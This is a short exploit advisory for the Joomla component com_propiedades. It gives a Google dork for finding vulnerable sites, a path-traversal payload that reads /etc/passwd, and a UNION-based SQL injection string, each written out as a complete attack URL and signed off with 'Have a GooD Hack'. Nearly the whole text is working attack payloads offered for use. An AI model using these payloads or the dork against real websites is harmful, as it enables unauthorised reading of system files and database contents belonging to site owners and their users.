# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities # Date: 23.06.2011 # Author: z0mbyak # Vendor or Software Link: find by yourself # Version: Don't know # Category: [remote, webapps.] # Google dork: inurl:"index.php?option=com_ propiedades" # Tested on: FreeBSD LFI Vulnerability: exploit: ../../../../../../../../../../../../etc/passwd%00 VulnSite: vulnsite.name/index.php?option=com_propiedades&controller=../../../../../../../../../../../../etc/passwd%00 SQL-Inj Vulnerability: exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0 VulnSite: vulnsite.name/index.php?option=com_propiedades&task=search&id_provincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0 P.S. The search function is made on Ajax, so you can also use a POST request to identify vulnerabilities. P.S.S Have a GooD Hack, and Greets From RUSSIA.